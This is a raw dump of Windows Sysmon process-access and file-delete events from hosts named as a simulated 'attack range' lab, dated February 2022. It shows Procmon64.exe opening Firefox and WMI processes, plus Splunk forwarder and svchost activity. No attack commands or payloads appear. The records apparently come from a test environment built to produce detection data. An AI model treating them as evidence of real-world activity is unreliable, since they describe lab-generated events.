AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000217542Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:49.566{4F8D34B0-12B5-6216-7E04-000000003902}32364076C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000217541Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:49.566{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F5D723C6BAE4A40A8256495635507BAE,SHA256=477E2F29184DF38D65FCE4EB778873F05C9FDE18FC1F4ECD22BF84731FFF8C4E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000289782Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:49.953{C8EA50B7-11CB-6216-2005-000000003802}23287020C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-11CF-6216-2205-000000003802}6168C:\Windows\system32\wbem\wmiprvse.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\Administrator\Downloads\Procmon64.exe+affdc|C:\Users\Administrator\Downloads\Procmon64.exe+ae307|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289781Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:49.931{C8EA50B7-11CB-6216-2005-000000003802}23287020C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-11CF-6216-2205-000000003802}6168C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\Administrator\Downloads\Procmon64.exe+ae1c2|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289780Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:49.931{C8EA50B7-11CB-6216-2005-000000003802}23287020C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-11B4-6216-1E05-000000003802}3624C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\Administrator\Downloads\Procmon64.exe+affdc|C:\Users\Administrator\Downloads\Procmon64.exe+ae307|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289779Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:49.853{C8EA50B7-11CB-6216-2005-000000003802}23287020C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-11B4-6216-1E05-000000003802}3624C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\Administrator\Downloads\Procmon64.exe+ae1c2|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289778Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:49.853{C8EA50B7-11CB-6216-2005-000000003802}23287020C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-11B2-6216-1D05-000000003802}5848C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\Administrator\Downloads\Procmon64.exe+affdc|C:\Users\Administrator\Downloads\Procmon64.exe+ae307|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289777Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:49.800{C8EA50B7-11CB-6216-2005-000000003802}23287020C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-11B2-6216-1D05-000000003802}5848C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\Administrator\Downloads\Procmon64.exe+ae1c2|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289776Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:49.800{C8EA50B7-11CB-6216-2005-000000003802}23287020C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-11AE-6216-1C05-000000003802}5564C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\Administrator\Downloads\Procmon64.exe+affdc|C:\Users\Administrator\Downloads\Procmon64.exe+ae307|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289775Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:49.715{C8EA50B7-11CB-6216-2005-000000003802}23287020C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-11AE-6216-1C05-000000003802}5564C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\Administrator\Downloads\Procmon64.exe+ae1c2|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289774Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:49.715{C8EA50B7-11CB-6216-2005-000000003802}23287020C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-11AE-6216-1B05-000000003802}5612C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\Administrator\Downloads\Procmon64.exe+affdc|C:\Users\Administrator\Downloads\Procmon64.exe+ae307|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289773Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:49.648{C8EA50B7-11CB-6216-2005-000000003802}23287020C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-11AE-6216-1B05-000000003802}5612C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\Administrator\Downloads\Procmon64.exe+ae1c2|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289772Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:49.631{C8EA50B7-11CB-6216-2005-000000003802}23287020C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-11AD-6216-1905-000000003802}4760C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\Administrator\Downloads\Procmon64.exe+affdc|C:\Users\Administrator\Downloads\Procmon64.exe+ae307|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289771Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:49.553{C8EA50B7-11CB-6216-2005-000000003802}23287020C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-11AD-6216-1905-000000003802}4760C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\Administrator\Downloads\Procmon64.exe+ae1c2|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289770Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:49.553{C8EA50B7-11CB-6216-2005-000000003802}23287020C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-11AD-6216-1805-000000003802}5296C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\Administrator\Downloads\Procmon64.exe+affdc|C:\Users\Administrator\Downloads\Procmon64.exe+ae307|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289769Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:49.453{C8EA50B7-11CB-6216-2005-000000003802}23287020C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-11AD-6216-1805-000000003802}5296C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\Administrator\Downloads\Procmon64.exe+ae1c2|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289768Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:49.453{C8EA50B7-11CB-6216-2005-000000003802}23287020C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-11AC-6216-1705-000000003802}5396C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\Administrator\Downloads\Procmon64.exe+affdc|C:\Users\Administrator\Downloads\Procmon64.exe+ae307|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289767Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:49.384{C8EA50B7-11CB-6216-2005-000000003802}23287020C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-11AC-6216-1705-000000003802}5396C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\Administrator\Downloads\Procmon64.exe+ae1c2|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289766Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:49.369{C8EA50B7-11CB-6216-2005-000000003802}23287020C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\Administrator\Downloads\Procmon64.exe+affdc|C:\Users\Administrator\Downloads\Procmon64.exe+ae307|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000289765Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:49.253{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A2F67F16E6C7082C47FA1B403BDE45AC,SHA256=B8E9B9EF4C5D528EAF7F4C9BF7D538DFE489B4BBF19EDE24C1E1A11700CBAC27,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000289764Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:49.247{C8EA50B7-11CB-6216-2005-000000003802}23287020C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\Administrator\Downloads\Procmon64.exe+ae1c2|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217540Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:49.348{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-12B5-6216-7E04-000000003902}3236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217539Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:49.348{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217538Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:49.348{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217537Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:49.348{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217536Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:49.348{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217535Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:49.348{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217534Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:49.348{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217533Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:49.348{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217532Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:49.348{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217531Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 